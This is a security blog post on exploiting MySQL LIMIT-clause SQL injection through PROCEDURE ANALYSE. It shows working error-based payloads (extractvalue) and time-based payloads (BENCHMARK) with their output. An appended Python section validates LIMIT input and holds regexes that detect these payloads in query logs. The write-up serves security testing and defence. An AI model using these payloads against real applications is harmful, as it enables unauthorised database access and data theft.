Countless articles have been written on the exploitation of SQL injection. This post is dedicated to a very specific situation. When assessing the severity of an SQL injection in a certain application, I encountered a problem which I was not able to solve quickly using a web search. The question is whether an SQL injection vulnerability in the LIMIT clause of a MySQL 5.x database is currently exploitable.

Example query:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point

The important point is that the above query contains an ORDER BY clause. In MySQL we cannot use ORDER BY before UNION; if ORDER BY were not there, it would be very easy to exploit simply using UNION syntax. The problem has appeared at stackoverflow and it was discussed at sla.ckers too.

So let's look at the syntax of SELECT in the MySQL 5 documentation:

SELECT
row_count ( row_count OFFSET offset ) ]

After the LIMIT clause the following clauses may occur: PROCEDURE and INTO. The INTO clause is not interesting unless the application uses a database account with permission to write files, which nowadays is a rather rare situation in the wild. It turns out that it is possible to solve our problem using the PROCEDURE clause. The only stored procedure available by default in MySQL is ANALYSE (see docs). Let's give it a try:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1)
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

The ANALYSE procedure can also take two parameters:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1)

This does not bode well for us. Let's see whether the parameters of ANALYSE are evaluated:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1)

This gives us an immediate response:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse'

Therefore, sleep() is certainly not being called. I didn't give up so fast and I finally found the vector:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

Voilà! The above solution is based on a handy, well-known technique, so-called error-based injection. If, therefore, our vulnerable web application discloses the errors of the database engine (a real chance, as such bad practices are common), the problem is solved.

What if our target doesn't display errors? Are we still able to exploit it successfully? It turns out that we can combine the above method with another well-known technique, time-based injection. In this case, our solution will be as follows:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

Interestingly, using SLEEP is not possible in this case; that's why there must be a BENCHMARK instead.

Update: As BigBear pointed out in the comment, a very similar solution was actually posted earlier on rdot.

Update: It would be awesome if this technique were implemented in sqlmap.
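To put the defender's side next to the queries above, here is an added example in Python (not code from the original post): a hardened way to build the LIMIT clause of the post's paginated query from request parameters, and a check that flags the PROCEDURE ANALYSE shape in logged statements. The log lines are constructed here in the style of the MySQL general query log, and the function names are my own.

```python
import re

MAX_ROWS = 100  # upper bound on rows a single page may request (assumed policy)

def build_query(offset_param: str, count_param: str) -> str:
    """Build the post's paginated query from untrusted request strings.

    LIMIT arguments cannot be bound as parameters by every driver, so each one
    is accepted only as a short unsigned decimal integer and then formatted in.
    A value such as "1,1 PROCEDURE ANALYSE(1)" is rejected before reaching SQL.
    """
    for value in (offset_param, count_param):
        if re.fullmatch(r"[0-9]{1,9}", value) is None:
            raise ValueError("LIMIT arguments must be unsigned integers")
    offset, count = int(offset_param), int(count_param)
    if count == 0 or count > MAX_ROWS:
        raise ValueError("row count out of range")
    return f"SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT {offset},{count}"

# Detection: a PROCEDURE ANALYSE clause appended after LIMIT is the shape used
# in the post; the probe inside it tells error-based from time-based variants.
PROCEDURE_AFTER_LIMIT = re.compile(r"\bLIMIT\b.*\bPROCEDURE\s+ANALYSE\s*\(", re.I | re.S)
TIME_PROBE = re.compile(r"\b(benchmark|sleep)\s*\(", re.I)
ERROR_PROBE = re.compile(r"\bextractvalue\s*\(", re.I)

def classify(sql: str) -> str:
    """Return 'ok', 'suspicious', 'error-based' or 'time-based' for one statement."""
    if PROCEDURE_AFTER_LIMIT.search(sql) is None:
        return "ok"
    if TIME_PROBE.search(sql):
        return "time-based"
    if ERROR_PROBE.search(sql):
        return "error-based"
    return "suspicious"

# Constructed sample log lines (general-log style); the queries are those from the post.
SAMPLE_LOG = [
    "2015-03-01T10:00:00Z 12 Query SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1",
    "2015-03-01T10:00:05Z 12 Query SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1)",
    "2015-03-01T10:00:09Z 12 Query SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)",
    "2015-03-01T10:00:14Z 12 Query SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)",
]

def scan_log(lines):
    """Return (line index, classification) for every line that is not 'ok'."""
    results = [(i, classify(line)) for i, line in enumerate(lines)]
    return [(i, label) for i, label in results if label != "ok"]

if __name__ == "__main__":
    for index, label in scan_log(SAMPLE_LOG):
        print(f"line {index}: {label}")
```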